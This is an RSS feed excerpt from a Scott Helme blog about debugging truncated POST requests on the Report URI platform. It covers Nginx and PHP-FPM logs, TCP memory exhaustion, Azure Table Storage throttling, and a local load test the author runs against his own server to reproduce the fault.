Sep 29 20:23:31 test-server php: POST length of 229376 bytes does not match declared Content-Length 1041121 bytes; all data discarded</code></pre><p></p><p></p><p>I guess the only thing left to do is to raise a bug (<a href="https://github.com/php/php-src/issues/12343?ref=scotthelme.co.uk" rel="noreferrer">done</a>) and see what see happens, but for now, at least I finally understand why PHP was trying to process those truncated JSON payloads! &#x1F389;</p><p></p><h4 id="outstanding-questions">Outstanding Questions</h4><p>The final piece of the puzzle that I&apos;m still trying to put together is how we end up in this situation. How does PHP end up reading only part of the request?</p><p>My knowledge on the inner workings of TCP sockets or Unix sockets is basically nothing and I&apos;ve learnt the little that I do know between this blog post and the last one. My current theory looks something like this, and bear in mind, this is mostly guess work!</p><p></p><ol><li>Nginx receives the full POST request from the client.</li><li>Nginx opens the socket to PHP and starts writing until the buffer is filled?</li><li>PHP is busy so no child process can spawn to handle the request?</li><li>Nginx times out and goes away.</li><li>PHP finally gets around to processing the request, which is limited to the partial content in the buffer.</li><li>PHP processes the partial request.</li></ol><p></p><p>Without knowing more on how sockets work, a large portion of my assumptions might be wrong, so it&apos;d be great to hear from someone with real knowledge in this area. If you can help out, please do drop by the comments below and give me some tips or answers! </p><p></p><p>Another <em>huge</em> thanks has to go to <a href="https://twitter.com/poupas?ref=scotthelme.co.uk" rel="noreferrer">Jo&#xE3;o Poupino</a> again for assistance with this post, it simply wouldn&apos;t have been possible otherwise &#x1F37B;</p><p></p>]]></content:encoded></item><item><title><![CDATA[Unravelling The Mystery Of Truncated POST Requests On Report URI]]></title><description><![CDATA[<p>This blog post is going to detail what was a pretty lengthy journey for me in debugging an elusive issue that started to occur on Report URI recently! It required me to investigate and learn about things that were outside of my area of expertise, created heaps of frustration and</p>]]></description><link>https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/</link><guid isPermaLink="false">6501c12b76a89b00010bc7b1</guid><category><![CDATA[Report URI]]></category><category><![CDATA[azure]]></category><category><![CDATA[table storage]]></category><category><![CDATA[nginx]]></category><category><![CDATA[tcp]]></category><category><![CDATA[truncated-post-requests]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 25 Sep 2023 09:47:14 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/09/image-3-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/09/image-3-1.png" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI"><p>This blog post is going to detail what was a pretty lengthy journey for me in debugging an elusive issue that started to occur on Report URI recently! It required me to investigate and learn about things that were outside of my area of expertise, created heaps of frustration and ultimately, of course, turned out to be my fault... &#x1F605;</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/09/report-uri-full.svg" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="300" height="58"></a></figure><p></p><h4 id="report-uri">Report URI</h4><p>I&apos;m sure that many regular readers will be familiar with <a href="https://report-uri.com/?ref=scotthelme.co.uk">Report URI</a>, the security monitoring and alerting platform that I founded and operate. Well, recently, I started to observe a sporadic issue that took me a little time to nail down. First, a little on our infrastructure to set the scene. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1237" height="547" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image.png 1237w" sizes="(min-width: 720px) 720px"></figure><p></p><ol><li>Data is sent by web browsers as a POST request with a JSON payload.</li><li>Requests pass through our Cloudflare Worker which aggregates the JSON payloads from many requests, returning a 201 to the client.</li><li>Aggregated JSON payloads are dispatched to our origin &apos;ingestion&apos; servers on a short time interval.</li><li>The ingestion servers process the reports into Redis.</li><li>The &apos;consumer&apos; servers take batches of reports from Redis, applying advanced filters, threat intelligence, quota restrictions and per-user settings, before placing them into persistent storage in Azure.</li></ol><p></p><p>The problem was occurring on our ingestion servers when we attempted to parse the JSON payload in the POST requests sent to our origin.</p><p></p><h4 id="jsonexception-3">JsonException #3</h4><p>The problem started with log entries of an exception coming from our ingestion servers. It seems fairly innocuous and, apparently, we were getting some invalid JSON payloads.</p><p></p><pre><code>Nette\Utils\JsonException #3
Control character error, possibly incorrectly encoded</code></pre><p></p><p>After inspecting the POST payload in the exception log, it was indeed truncated, causing the <code>Json:decode()</code> to throw an exception.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-1.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1585" height="457" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-1.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-1.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-1.png 1585w" sizes="(min-width: 720px) 720px"></figure><p></p><p>I was concerned that the exception log may be truncating the POST payload, as indicated at the end of the line, so I enabled some additional logging when handling the <code>JsonException</code> to log the value of the <code>content_length</code> header (<code>$_SERVER[&apos;CONTENT_LENGTH&apos;]</code>) and the size of the raw POST body that PHP is seeing (<code>strlen(file_get_contents(&apos;php://input&apos;))</code>). Here are the results.</p><p></p><pre><code>[2023-09-02 17-54-26] Problem parsing JSON, content length: 261671
[2023-09-02 17-54-26] Post size was: 65536
[2023-09-02 17-54-27] Problem parsing JSON, content length: 236481
[2023-09-02 17-54-27] Post size was: 65536
[2023-09-02 17-54-27] Problem parsing JSON, content length: 237498
[2023-09-02 17-54-27] Post size was: 65536</code></pre><p></p><p>It does seem that the declared content length is much larger than what PHP is receiving, and it&apos;s not a misleading exception because of truncation in the exception logging, we are actually seeing a truncated payload. It&apos;s also interesting to note that the request body is always truncated at 65,536 bytes regardless of how big the actual payload is.</p><p></p><h4 id="checking-nginx">Checking Nginx</h4><p>My next step was to go upstream and add some additional logging to Nginx which is our web server / proxy in front of PHP-FPM. I wanted to see whether I could observe the same truncated payload behaviour between Nginx and PHP to narrow down where the issue was happening. Here&apos;s the Nginx log format I used.</p><p></p><pre><code>log_format post &apos;$time_local: req_len $request_length - con_len $http_content_length&apos;;</code></pre><p></p><p>This gave me the following log entries when I enabled logging on the ingestion servers.</p><p></p><pre><code>02/Sep/2023:18:13:24 +0000: req_len 205 - con_len 453
02/Sep/2023:18:13:27 +0000: req_len 35266 - con_len 60944
02/Sep/2023:18:13:27 +0000: req_len 389327 - con_len 923803
02/Sep/2023:18:13:27 +0000: req_len 262352 - con_len 1355353
02/Sep/2023:18:13:27 +0000: req_len 207 - con_len 509168</code></pre><p></p><p>I&apos;m using the <code>$request_length</code> <a href="https://nginx.org/en/docs/http/ngx_http_log_module.html?ref=scotthelme.co.uk#var_request_length:~:text=request%20length%20(including%20request%20line%2C%20header%2C%20and%20request%20body)">variable</a> in Nginx which is the &quot;request length (including request line, header, and request body)&quot; and the <code>$http_</code> <a href="https://nginx.org/en/docs/http/ngx_http_core_module.html?ref=scotthelme.co.uk#var_http_:~:text=arbitrary%20request%20header%20field%3B">variable</a> which allows you to log out an &quot;arbitrary request header field&quot;, such as <code>$http_content_length</code>. As you can see, the declared content length is again much larger than the actual request body received. There is always a slight discrepancy here as the <code>$request_length</code> includes the request line and headers, along with the body, and <code>$http_content_length</code> is only the body, but even factoring that in, the difference is significant. </p><p></p><h4 id="checking-the-cloudflare-worker">Checking the Cloudflare Worker</h4><p>At first glance, the logs above lead me to our Cloudflare logs which we collect via Log Push, but I was conscious that in this scenario it felt far more likely that I was at fault than them. Still though, I&apos;d gone from PHP, to Nginx and now the next upstream step was to the Cloudflare Worker.</p><p>After trawling through our logs for the corresponding time that we were getting the JSON exceptions (which had stopped of their own accord after ~45 mins), I couldn&apos;t find anything that stood out other than Cloudflare receiving 500 errors from our origin, which was to be expected. Not finding anything particularly useful, it looked like Cloudflare was sending us the requests with a proper payload. I added some additional logging to our Worker so that if the issue were to return, we&apos;d potentially have some extra information to work with.</p><p>Many of the issues I expected we might see should already be logged because Workers will log all uncaught exceptions, but it&apos;s easy to add some <code>console.log()</code> calls which will also be captured (<a href="https://developers.cloudflare.com/workers/observability/log-from-workers/?ref=scotthelme.co.uk"><em>source</em></a>). I also added some additional request headers on requests to our origin so we could log those and compare metrics like the size of the payload before sending to the declared content-length and then the observed content-length.</p><p></p><pre><code>  return {
    &quot;X-Request-Body-Length&quot;: requestBodyLen.toString(),
    &quot;X-Distinct-Reports&quot;:  distinctReports.toString(),
    &quot;X-Total-Reports&quot;: totalReports.toString(),
  }</code></pre><p></p><p>I then decided to do some more investigation across our origin servers to look for clues because I still wasn&apos;t sure what had happened. </p><p></p><h4 id="cpu-overload">CPU overload!</h4><p>I took a look at our DigitalOcean dashboard to see how the ingestion servers were holding up during the window that the JSON exceptions were being thrown, and it seems that they were more than a little busy!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-2.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1027" height="328" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-2.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-2.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-2.png 1027w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Yikes... This seemed odd because the JSON parse was failing, so I&apos;d have assumed that they were doing significantly less than usual because the problematic inbound requests effectively leave them with nothing to do... During the same time window I could also see elevated Load, elevated RAM usage (but still plenty to spare), no noticeable disk activity (so we weren&apos;t paging) and no noticeable change in our ingress (so we didn&apos;t have a traffic spike). Our egress on the ingestion servers did display a drop, but that makes sense because there will be less traffic going to Redis if we&apos;re not processing as many reports. What on Earth is chewing up that much CPU?</p><p></p><h4 id="resource-exhaustion">Resource exhaustion</h4><p>I was caught up on the CPU being slammed at 100% utilisation, especially when we weren&apos;t processing our usual volume of reports. After more research online and more debugging, I took a look at syslog and scrolled back to the time window of the issue and found the following entries.</p><p></p><pre><code>Sep  2 20:22:14 report-ingestion-60 kernel: [12697.456786] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.485758] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.520596] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.826360] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12697.973408] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12698.075398] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:14 report-ingestion-60 kernel: [12698.183949] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:15 report-ingestion-60 kernel: [12699.001482] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:15 report-ingestion-60 kernel: [12699.073934] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:15 report-ingestion-60 kernel: [12699.148919] TCP: out of memory -- consider tuning tcp_mem
Sep  2 20:22:19 report-ingestion-60 kernel: [12702.594396] net_ratelimit: 42 callbacks suppressed</code></pre><p></p><p>Huh! This at least gave me something to work with so it was off to do some reading up on exactly what this error messages means, thinking of possible causes and investigating what a solution might look like.</p><p></p><h4 id="tcp-out-of-memoryconsider-tuning-tcpmem">TCP: out of memory -- consider tuning tcp_mem</h4><p>We&apos;re delving outside of my area of expertise now, but I needed to identify the cause of the issue and put a solution in place so that it wouldn&apos;t happen again. I started off by looking at what <code>tcp_mem</code> is in the Linux <a href="https://man7.org/linux/man-pages/man7/tcp.7.html?ref=scotthelme.co.uk#:~:text=for%20full%20throughput.-,tcp_mem,-(since%20Linux%202.4">manual</a> and I got the following:</p><p></p><pre><code>              This is a vector of 3 integers: [low, pressure, high].
              These bounds, measured in units of the system page size,
              are used by TCP to track its memory usage.  The defaults
              are calculated at boot time from the amount of available
              memory.  (TCP can only use low memory for this, which is
              limited to around 900 megabytes on 32-bit systems.  64-bit
              systems do not suffer this limitation.)

              low    TCP doesn&apos;t regulate its memory allocation when the
                     number of pages it has allocated globally is below
                     this number.

              pressure
                     When the amount of memory allocated by TCP exceeds
                     this number of pages, TCP moderates its memory
                     consumption.  This memory pressure state is exited
                     once the number of pages allocated falls below the
                     low mark.

              high   The maximum number of pages, globally, that TCP
                     will allocate.  This value overrides any other
                     limits imposed by the kernel.</code></pre><p></p><p>This seems straightforward enough and the values are not something that I&apos;ve looked at before. We use the vanilla <code>Ubuntu 22.04 (LTS) x64</code> image from DigitalOcean when creating all of our servers, so the values would still be whatever the defaults were. </p><p></p><pre><code>$cat /proc/sys/net/ipv4/tcp_mem
22302   29739   44604</code></pre><p></p><p>Given that the unit of measurement here is units of system page size, we need that to calculate total size values.</p><p></p><pre><code>$getconf PAGESIZE
4096</code></pre><p></p><p>So, 4096 bytes per page gives us the following.</p><p></p><pre><code>22302 pages x 4096 bytes = 91.348992 MB
29739 pages x 4096 bytes = 121.810944 MB
44604 pages x 4096 bytes = 182.697984 MB</code></pre><p></p><p>I have no idea if these values are suitable or even if/how they should be tuned, so it was time for another venture down a rabbit hole of research!</p><p>After reading countless blog posts on the topic, I wasn&apos;t sure if I knew more or less than I did before... There seem to be countless ways to tackle the problem of tuning these values and people have different opinions on how to calculate the new values too. Another problem that I had was, even if I did tune them, I&apos;d need to come up with a way to reproduce the issue to test the fix, and I didn&apos;t know what was actually causing the problem yet either.</p><p></p><h4 id="what-is-using-tcp-resources">What is using TCP resources?</h4><p>Given that the problem revolves around resource exhaustion, specifically TCP memory resources, one solution could be to simply &apos;add more cloud&apos;. Spreading the load over more servers should certainly help to reduce resource issues, but it&apos;s not the right solution. I took a look at what might be using TCP resources on these systems to see if that might point me to something. </p><p></p><ol><li>The Cloudflare Worker initiates TCP connections to our origin to send HTTPS requests.</li><li>PHP connects to Redis using a TCP socket because the Redis Server sits on our private network.</li></ol><p></p><p>That didn&apos;t seem like a particularly large amount of load but then, <a href="https://twitter.com/spazef0rze?ref=scotthelme.co.uk">Michal &#x160;pa&#x10D;ek</a> (former Report URI staffer and someone I&apos;d reached out to for help), asked me to check how Nginx was talking to PHP. Turns out we were still using the default configuration that has been there since the dawn of Report URI, and that was a TCP socket! So, now, our list of things putting pressure on TCP resources is.</p><p></p><ol><li>Cloudflare Worker --&gt; TCP --&gt; Ingestion Servers</li><li>Nginx --&gt; TCP --&gt; PHP</li><li>PHP --&gt; TCP --&gt; Redis</li></ol><p></p><p>That seems like a really unnecessary overhead and one that&apos;s easy to remove. I switched PHP over to using a Unix Socket instead of a TCP Socket, deployed it on a canary server and waited to see if the change was good. Here&apos;s the config change that this needed along with a service reload for both Nginx and PHP-FPM.</p><p></p><pre><code>nginx v-host config
- fastcgi_pass 127.0.0.1:9000;
+ fastcgi_pass unix:/run/php/php8.2-fpm.sock;

php-fpm config
- listen = 127.0.0.1:9000
+ listen = /run/php/php8.2-fpm.sock</code></pre><p></p><p>The change seemed good with no adverse effects so I deployed it across the entire fleet, not just the ingestion servers. Everything is managed with Ansible so making changes like this across a large number of servers is really easy.</p><p></p><h4 id="then-it-happened-again">Then it happened again...</h4><p>Shit... Having alleviated what should be approximately 1/3 of the load on TCP resources, I was surprised to see this happening again. I wanted to do some investigation while the problem was happening, and fortunately it happened while I was at my desk, so I dug in. I&apos;d also deployed some better monitoring to the fleet in the form <a href="https://www.netdata.cloud/?ref=scotthelme.co.uk">NetData Monitoring</a> so that I&apos;d have much more detailed information if the issue came back. (thanks for the suggestion <a href="https://twitter.com/poupas?ref=scotthelme.co.uk">Jo&#xE3;o Poupino</a>, who was now also involved in helping out!) </p><p>The issue was much shorter in duration this time, but I had a lot more logging and data ready to help me. It seems that PHP was chewing through all of the CPU resources on the servers.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-3.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1363" height="475" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-3.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-3.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-3.png 1363w" sizes="(min-width: 720px) 720px"></figure><p></p><p>There was also a huge spike in open sockets (file descriptors) coming from Nginx.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-4.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="820" height="472" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-4.png 600w, https://scotthelme.co.uk/content/images/2023/09/image-4.png 820w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This means that Nginx is backlogging requests and that&apos;s likely because PHP is stalled out and I suspect we&apos;ve hit <code>pm.max_children = 64</code> which is what we use in production. The 64 PHP processes are busy, no more can spawn, and Nginx is just going to wait to timeout on the <code>fastcgi_pass</code> causing it to backup on incoming connections. Zooming in, we can see that PHP starts to consume sockets first, but then it plateaus, and shortly after that, nginx goes wild and starts massively ramping up on open sockets. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-15.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1297" height="385" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-15.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-15.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-15.png 1297w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Seems like a solid theory, but, why? What could PHP possibly be doing, especially as the same truncation of POST requests is happening so it should be doing basically nothing!</p><p></p><h4 id="looking-at-the-logs-more-closely">Looking at the logs more closely</h4><p>As you saw above, the issue started and stopped within ~1 minute and I didn&apos;t change or do anything to impact that. It also happened across our entire fleet of ingestion servers during the same window, give or take a second or two, which makes this more interesting and was suggesting an external factor to the ingestion servers. We centralise <em>all</em> of our logs to <a href="https://www.papertrail.com/?ref=scotthelme.co.uk">Papertrail</a> so I could go and take a time-slice for these two events and look at everything that happened across all of our servers. Of course, there were many of the expected log events with the <code>TCP: out of memory -- consider tuning tcp_mem</code> happening across both incidents and the improved <code>JsonException</code> logging giving me more information too. As before, it seemed like the requests coming from Cloudflare were doing just fine and then, when they hit our origin, the problems begin.</p><p>This was when I spotted something that I&apos;d seen before in the logs during the first incident, but noticed that these entries were also present in the second incident too. I&apos;d been focusing on the ingestion servers but I now noticed that some of our other servers were throwing a very small number of seemingly unrelated errors at the same time. I widened the time-slice to see if these other servers were throwing the errors before and/or after the incident and it turns out, they weren&apos;t.</p><p></p><pre><code>Sep 18 15:28:36 report-consumer-65 info.log [2023-09-18 15-28-36] We lost a batch (actually 10): cURL error 7: Failed to connect to reporturi.table.core.windows.net port 443 after 444 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://reporturi.table.core.windows.net/$batch  @  CLI (PID: 1657091): /var/www/html/report-uri/public/www/index.php Process  @@@  git:40620dc</code></pre><p></p><p>Our consumer servers sit behind Redis and pull out batches of reports to process into Azure Table Storage, and they were receiving a variety of errors when talking to Azure. There were connection timeout errors, connection refused errors and then successful connections, but a 503 Service Unavailable response. It seemed odd that these issues were starting and stopping during the same time window that our ingestion servers were having their issues, even though the two are isolated and independent from each other. I hadn&apos;t thought to look much into our Redis server because it already has some very tight monitoring and alerting setup, and I hadn&apos;t observed any issues with it throughout. There was a minor drop in traffic from the ingestion servers during the incident, again expected, but other than, it was doing just fine. I then noticed something else in the logs.</p><p></p><h4 id="batches-of-rejected-reports">Batches of Rejected Reports</h4><p>When the Cloudflare Worker talks to our origin, there are three endpoints that reports can be sent too. We have <code>batch_reports()</code> which is for a batch of reports to be processed as normal into your account and visible in the Reports/Graphs pages, we have <code>batch_wizard()</code> which is for a batch of reports that were sent to the <a href="https://docs.report-uri.com/setup/wizard/?ref=scotthelme.co.uk">CSP Wizard</a>, and then <code>batch_reject()</code> which is for reports that the Worker rejected and only need to be counted in your Rejected Reports metrics but not otherwise processed. The vast majority of the exceptions being thrown when parsing the JSON were for requests sent to the <code>batch_reject()</code> endpoint, the one that seemingly has the least to actually do! I decided to walk through the code and refresh my memory because, after all, this was written quite a number of years ago. Here are the three methods, nice and simple:</p><p></p><pre><code class="language-php">	public function batch_reports(): void
	{
		$this-&gt;checkRequestIsPost();
		$this-&gt;batch(RedisKeys::REPORTS());
	}


	public function batch_wizard(): void
	{
		$this-&gt;checkRequestIsPost();
		$this-&gt;batch(RedisKeys::WIZARD());
	}


	public function batch_reject(): void
	{
		$this-&gt;checkRequestIsPost();
		$rawBody = $this-&gt;httpRequest-&gt;getRawBody();
		try {
			$rejects = $rawBody ? Json::decode($rawBody, Json::FORCE_ARRAY) : null;
		} catch (JsonException) {
			Debugger::log(&apos;Problem parsing REJECT JSON, content length: &apos; . $_SERVER[&apos;CONTENT_LENGTH&apos;]);
			Debugger::log(&apos;Post size was: &apos; . strlen($rawBody));
			$rejects = null;
		}
		if (is_array($rejects) &amp;&amp; count($rejects) &gt; 0) {
			$this-&gt;reject-&gt;toRedis($rejects);
		}
		$this-&gt;output-&gt;set_status_header(201);
	}</code></pre><p></p><p>As you can see, <code>batch_reports()</code> and <code>batch_wizard()</code> go straight to Redis, but <code>batch_reject()</code> has the extra bit of logging I&apos;d added, yes, but it puts these reports into Redis using <code>$this-&gt;reject-&gt;toRedis()</code> instead. This is when I quickly started to unravel things.</p><p></p><h4 id="a-quick-history-lesson">A quick history lesson</h4><p>The Cloudflare Worker used to buffer and pass reports to our ingestion servers, where the existence of the user would then be checked and the reports processed if a user existed to receive them, or rejected otherwise. This was a lot of load on the ingestion servers at what is the highest velocity segment of our processing pipeline, so, ~5 years ago we built a new feature so the Worker could maintain state about our users. By giving the Worker the ability to query our origin and check for the existence of a user, and then caching the result locally, we could have the Worker discard reports much sooner in the process. This is where <code>batch_reject()</code> came in above, using slightly different code.</p><p>We also wanted to avoid hitting Table Storage so aggressively to query the existence of a user so we implemented a service that would maintain a &apos;User Entity Cache&apos; in Redis and keep it aligned with Table Storage. Now, services could query Redis instead of Table Storage and we saw some enormous performance improvements and a reduction in load on Table Storage as a result. Over time, more and more areas of our code were migrated to use this new User Entity Cache and we now have a `User Entity` service that will transparently query Redis first, and then gracefully fall back to Table Storage if needed, populating Redis in the process. </p><p>Except, this old rejected report code wasn&apos;t using that process... Calling <code>$this-&gt;reject-&gt;toRedis()</code> still has a direct dependency on Table Storage, despite what the name implies.</p><p></p><h4 id="one-query-to-rule-them-all-one-query-to-find-them-one-query-to-bring-them-all-and-in-the-darkness-bind-them">One query to rule them all<br>One query to find them<br>One query to bring them all<br>And in the darkness bind them<br></h4><p>Our <code>batch_reject()</code> code was still using a fairly legacy approach to handling these reports and would simply grab the list of our users from Table Storage and run the list of rejected reports against the user list, counting rejected reports where users existed and discarding them otherwise. This worked pretty well, and has actually worked fine up until now. Table Storage is fast, queries are cheap, and sure, it&apos;s a bad approach, but it&apos;s never been a problem. But, we&apos;re a lot bigger now with a lot more users than before. This is where the problem came in.</p><p>A query to grab the list of all our users used to be quite a small one. Heck, when we started there was only one user in there! Over time though, that number of users has increased to hundreds, then thousands, and then tens of thousands, and now, we&apos;re closing the gap to six figures. It&apos;s become an increasingly larger query over time and, because we&apos;re talking to Table Storage, I also need to update my TCP overheads list from earlier.</p><p></p><ol><li>Cloudflare Worker --&gt; TCP --&gt; Ingestion Servers</li><li><s>Nginx --&gt; TCP --&gt; PHP</s></li><li>PHP --&gt; TCP --&gt; Redis</li><li>PHP --&gt; TCP --&gt; Azure Table Storage</li></ol><p></p><p>When I thought I&apos;d reduced our overheads on TCP by 1/3, it was only a 1/4 reduction, and it means that those error logs from our consumer servers are now relevant. If they&apos;re having issues talking to Table Storage, then the ingestion servers probably are too.</p><p></p><h4 id="breaching-azure-table-storage-performance-limits">Breaching Azure Table Storage Performance Limits</h4><p>Azure Table Storage is fast, really fast, but everything has limits, and we were pushing the limits of Table Storage. The limit for <a href="https://learn.microsoft.com/en-us/azure/storage/tables/storage-performance-checklist?ref=scotthelme.co.uk#entities-per-second-storage-account">Entities Per Second</a> set by Microsoft is defined as:</p><p></p><blockquote>The scalability limit for accessing tables is up to 20,000 entities (1 KB each) per second for an account.</blockquote><p></p><p>A couple of things stood out to me right away here. First of all, we have tens of thousands of users, and many servers performing that query, so it&apos;s not going to be hard for us to hit 20,000 entities queried per second, but there&apos;s also a size limit. If it&apos;s 20,000 entities per second, with a 1 KB size, I assume that gives us a theoretical maximum read rate of 20 MB/s, otherwise the size wouldn&apos;t need to be specified. Our typical user entity isn&apos;t too much larger than this, at 4-5 KB, but we&apos;re definitely going to see reduced entity query rates if the size is a factor.</p><p>I went over to the Azure Portal and there is a metric available for our storage account to look at the amount of throttled transactions against our tables, and...</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-13.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1867" height="700" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-13.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-13.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/09/image-13.png 1600w, https://scotthelme.co.uk/content/images/2023/09/image-13.png 1867w" sizes="(min-width: 720px) 720px"></figure><p></p><p>We were being throttled by Azure! I&apos;m not sure of the specifics around how this works, and I was seeing connection timeout, connection refused and 503 errors in our logs, but those things would make sense if we were approaching the performance capabilities of Table Storage. The two larger spikes to the right also align with when I observed the issue happening, but not the other spikes. Perhaps they weren&apos;t big enough to trigger the backlog problem and we were able to ride it out, but this felt like I was on to something.</p><p></p><h4 id="exponential-backoff">Exponential backoff</h4><p>I dug into our code again to see what the behaviour would be in this scenario, where connections or transactions against Table Storage are failing, and we&apos;re using an exponential backoff. That&apos;s a sensible approach, and maybe our values need tweaking, but it&apos;s not a bad setup. </p><p></p><pre><code class="language-php">	private static function pushMiddlewares(ServiceRestProxy $service): void
	{
		$service-&gt;pushMiddleware(RetryMiddlewareFactory::create(
			RetryMiddlewareFactory::GENERAL_RETRY_TYPE, &lt;-- retry type
			3, &lt;-- number of retries
			1000, &lt;-- interval in ms
			RetryMiddlewareFactory::EXPONENTIAL_INTERVAL_ACCUMULATION, &lt;-- accumulation method
			true, &lt;-- retry on connection failures
		));
		$service-&gt;pushMiddleware(new SanitizeExceptionMiddleware());
	}</code></pre><p></p><p>With the connection timeouts/failures, or slow responses from Table Storage to get the 503, taking up to 1,000ms or more, coupled with this retry logic, there are easily scenarios here where PHP could be tied up for 15+ seconds. That&apos;s a lot of waiting around, and still only a good theory at this point, so it was time to test it.</p><p></p><h4 id="reproducing-the-issue-locally">Reproducing the issue locally</h4><p>Because all I had was a theory, I wanted to reproduce it and see it with my own eyes. Given the relative simplicity of this problem, it shouldn&apos;t prove too hard to reproduce, so I fired up a server with the same resources as our ingestion servers and created a simple PHP script.</p><p></p><pre><code>&lt;?php

  $fp = fsockopen(&quot;scotthelme.co.uk&quot;, 80, $errno, $errstr, 30);

  sleep(30);

  $json = json_decode(file_get_contents(&apos;php://input&apos;));

  if ($json == null) {
    syslog(LOG_WARNING, &quot;JSON decode failed: &quot; . $_SERVER[&apos;CONTENT_LENGTH&apos;] . &quot; &quot; . strlen(file_get_contents(&apos;php://input&apos;)));
  }</code></pre><p></p><p>The script needed to simulate what our ingestion servers were doing so it would:</p><p></p><ol><li>Receive an HTTP POST request with a JSON payload.</li><li>Nginx would pass that to PHP via a Unix Socket.</li><li>PHP opens a TCP connection to pressure TCP resources.</li><li>PHP sleeps to simulate slow external connections.</li><li>Try to parse the JSON payload.</li></ol><p></p><p>In order to hit this endpoint with load, I created a simple bash script on my local.</p><p></p><pre><code>#!/bin/bash
curl --location &apos;http://167.99.196.71/&apos; \
-H &apos;Content-Type: text/plain&apos; \
-X POST \
-d @post.data \
--insecure</code></pre><p></p><p>The <code>post.data</code> file contained 1MB of valid JSON so I had a sizeable POST request to test with and then, I just needed to load up the server with requests.</p><p></p><pre><code>$ for i in $(seq 50); do ./post.sh &amp; done</code></pre><p></p><p>This would fire up 50 instances of the script at the same time and the command can be run sequentially on a time interval to progressively load up the server. It didn&apos;t take long...</p><p></p><pre><code>Sep 18 22:57:41 delete-me kernel: [ 6910.201032] TCP: out of memory -- consider tuning tcp_mem
Sep 18 22:57:41 delete-me kernel: [ 6910.275034] TCP: out of memory -- consider tuning tcp_mem
Sep 18 22:57:41 delete-me kernel: [ 6910.624642] TCP: out of memory -- consider tuning tcp_mem
Sep 18 22:57:44 delete-me kernel: [ 6913.017896] net_ratelimit: 9 callbacks suppressed
Sep 18 22:57:44 delete-me kernel: [ 6913.017900] TCP: out of memory -- consider tuning tcp_mem
